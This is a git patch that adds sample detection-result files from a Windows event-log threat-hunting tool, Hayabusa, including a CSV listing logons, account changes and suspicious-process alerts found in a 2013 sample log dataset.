From 4a73a8c66c29f14ad82b37d6fc9e8a87e475de7f Mon Sep 17 00:00:00 2001
From: Tanaka Zakku <71482215+YamatoSecurity@users.noreply.github.com>
Date: Wed, 22 Dec 2021 11:27:06 +0900
Subject: [PATCH] Sample results

---
 ...usa-sample-evtx-ResultsDefaultSettings.csv | 10073 +++++++++++
 ...sa-sample-evtx-ResultsDefaultSettings.xlsx |   Bin 0 -> 583620 bytes
 ...-ResultsDeprecatedAndNoisyRulesEnabled.csv | 14207 ++++++++++++++++
 ...ResultsDeprecatedAndNoisyRulesEnabled.xlsx |   Bin 0 -> 711827 bytes
 4 files changed, 24280 insertions(+)
 create mode 100644 sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.csv
 create mode 100644 sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.xlsx
 create mode 100644 sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.csv
 create mode 100644 sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.xlsx

diff --git a/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.csv b/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.csv
new file mode 100644
index 00000000..0ae6f001
--- /dev/null
+++ b/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.csv
@@ -0,0 +1,10073 @@
+Timestamp,Computer,EventID,Level,RuleTitle,Details,RulePath,FilePath
+2013-10-24 01:16:13.843 +09:00,37L4247D28-05,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:16:29.000 +09:00,37L4247D28-05,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:18:09.203 +09:00,37L4247D28-05,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:18:50.500 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:21:30.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:21:33.630 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:22:39.911 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser  :  SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx
+2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser  :  SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: -  :  SID: S-1-5-21-3463664321-2923530833-3546627382-1000  :  Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx
+2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: -  :  SID: S-1-5-21-3463664321-2923530833-3546627382-1000  :  Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:22:44.979 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: WIN-QALA5Q3KJ43$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: WIN-QALA5Q3KJ43  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x298c5  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: WIN-QALA5Q3KJ43  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x29908  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:44.979 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x298c5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:24:00.161 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:24:53.630 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:27:21.754 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x29908,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:30:47.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:30:47.140 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:30:52.625 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:30:58.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:31:10.741 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:33:10.078 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:33:18.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:33:31.593 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 02:36:53.671 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x57d5b  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x57d8d  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:36:53.671 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x57d5b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:45:29.131 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:45:45.037 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x57d8d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:50:25.546 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:50:27.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:50:33.551 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:51:17.207 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x27f43  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x27f73  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:51:17.207 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x27f43,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 03:49:28.191 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:02:24.316 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x27f73,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:04:28.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:04:55.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:05:04.098 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:06:18.921 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:06:25.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:07:16.729 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:19:46.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:19:52.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:20:01.879 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:23:04.093 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:23:08.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:23:18.798 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:25:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:25:30.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 04:27:14.204 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x39a20  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x39a67  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:27:14.204 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x39a20,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:34:54.649 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x39a67,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:36:39.718 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
